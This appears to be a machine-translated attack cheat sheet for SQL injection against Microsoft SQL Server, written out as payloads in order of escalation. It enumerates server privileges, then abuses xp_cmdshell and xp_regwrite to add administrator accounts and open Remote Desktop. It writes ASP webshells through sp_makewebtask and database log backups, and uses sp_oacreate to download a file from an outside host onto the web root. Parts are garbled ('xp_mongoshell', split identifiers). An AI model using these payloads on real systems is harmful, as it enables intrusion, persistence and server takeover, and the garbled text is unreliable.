1. collect basic information 1. injection point type judgment and exists (select * from sysobjects) 2. injection Point permission judgment and 1 = (select is_srvrolemember ('sysadmin') // determine whether it is a system administrator and 1 = (select is_srvrolemember ('db _ owner ')) // determine whether the database permission is and 1 = (select is_srvrolemember ('public') // determine whether the database permission is public. 3. obtain other information; declare @ d int // judge MsSQL supports multi-line statement query and (select count (1) from [sysobjects])> = 0 // whether subquery and user> 0 // obtain the current database username and db_name> 0 // obtain the current database name and 1 = convert (int, Db_name () or 1 = (select db_name () // The current database name and 1 = (select @ servername) // local service name and 1 = (select HAS_DBACCESS ('master') // determine whether the database has read permission 2. Use MsSQL to expand storage injection attacks 1. checks and restores extended storage to determine whether xp_mongoshell extended storage exists and 1 = (select count (*) from master. dbo. sysobjects where xtype = 'X' AND name = 'xp _ external shell ') Determine whether the xp_regread extended stored procedure exists and 1 = (select count (*) from master. dbo. sysobjects where name = 'xp _ regread ') Restore; exec sp_dropextendedproc 'Xp _ cmdshell'; exec sp_dropextendedproc xp_cmdshell, 'xp log70. dll '3. method 1 to exploit extended storage attacks under sa Permissions. run any command to View Drive C using xp_mongoshell extension; drop table black; create TABLE black (mulu varchar (7996) NULL, ID int not null identity ))--; insert into black exec master .. xp_mongoshell 'dir c: \ 'and 1 = (select top 1 mulu from black where id = 1) create a user; exec master .. xp_mongoshell 'net user test/add'; exec master .. xp_mongoshell 'net lo Calgroup administrators test/add' open 3389; exec master .. 
xp_cmdshell 'SC config termservice start = auto'; exec master .. xp_mongoshell 'net start termservice'; exec master .. xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"/v www.2cto.com fDenyTSConnections/t REG_DWORD/d 0x0/F' // allow external connections; exec master .. xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentContr OlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp "/v PortNumber/t REG_DWORD/d 0x50/F' // you can change the port to 80, either put it at the beginning and execute 2. xp_regwrite operation registry; exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion \ run', 'black', 'reg _ SZ ', 'Net user test/add' enables sandbox mode; exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1 and then use je T. oledb: select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c: \ windows \ system32 \ ias \ dnary. mdb ', 'select shell ("net user test/add")') Note: If the injection point parameter is of the integer type, you can specify "ias. mdb "database; if it is a string character type, you can specify dnary. mdb. For windows 2000 systems, the database path should be specified as "x: \ winnt \ system32 \ ias. mdb ". 3. use sp_makewebtask to write a trojan; exec sp_makewebtask e: \ www_iis \ ytasks. asp ', 'select' % 3C % 25% 65% 76% 61% 6C % 20% 72% 65% 71% 75% 65% 73% 74% 28% 22% 63% 68% 6F % 70% 70% 65% 72% 22% 29% 3E ''' -- 4. use sp_oacreate to store remote download files (this is the principle of a vulnerability exploitation tool in ah d); DECLARE @ B varbinary (8000), @ hr int, @ http INT, @ down int exec sp_oacreate [Microsoft. 
XMLHTTP], @ http output EXEC @ hr = sp_oamethod @ http, [Open], null, [GET], [ http://www.test.com/muma.txt ], 0 EXEC @ hr = sp_oamethod @ http, [Send], null EXEC @ hr = sp_OAGetProperty @ http, [responseBody], @ B output EXEC @ hr = sp_oacreate [ADODB. stream], @ down output EXEC @ hr = sp_OASetProperty @ down, [Type], 1 EXEC @ hr = sp_OASetProperty @ down, [mode], 3 EXEC @ hr = sp_oamethod @ down, [Open], null EXEC @ hr = sp_oamethod @ down, [Write], null, @ B EXEC @ hr = sp_oamethod @ down, [SaveToFile], null, [e: \ www_iis \ muma. asp], 1 to download the file: http://www.test.com/muma.txt Content to e: \ www_iis \ muma. asp successfully writes a webshell. 5. sp_addlogin extends the management of database users; exec master. dbo. sp_addlogin test, password exec master. dbo. sp_addlogin test, sysadmin 6. xp_servicecontrol Management Service (not useful for self-testing) can be used to stop or activate a service. exec master .. xp_servicecontrol 'stop', 'schedule' // stop the scheduled Task Service; exec master .. xp_servicecontrol 'start', 'schedule'; exec master .. xp_servicecontrol 'start', 'server' // start server Service 7. get the current web directory; drop table black; create TABLE black (mulu varchar (7996) NULL, ID int not null identity (255) --; DECLARE @ result varchar) EXEC master. dbo. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System \ ControlSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots', '/', @ result output insert into black (mulu) values (@ result) -- and 1 = (select top 1 mulu from black where id = 1) 4. Exploitation of extended attacks under the dbowner permission 1. determine Database User Permissions and 1 = (select is_member ('db _ owner'); -- 2. search for the web directory; create table temp (dir nvarchar (255), depth varchar (255), files varchar (255), ID int not null identity (); -- then; insert into temp (dir, depth, files) exec master. dbo. 
xp_dirtree 'C: ', -- and (select dir from temp where id = 1)> 0 Because you cannot obtain all directory files and folder names at once, you need to change the ID value and list files and folders in sequence. Once the web directory is known, a Trojan can be written to it. alter database news set recovery full; create table test (str image) --; backup log news to disk = 'C: \ test' with init --; insert into test (str) values ('<% excute (request ("cmd") %> ')--; backup log news to disk = 'C: \ inetpub \ wwwroot \ ylarge. asp '--; alter database news RECOVERY simple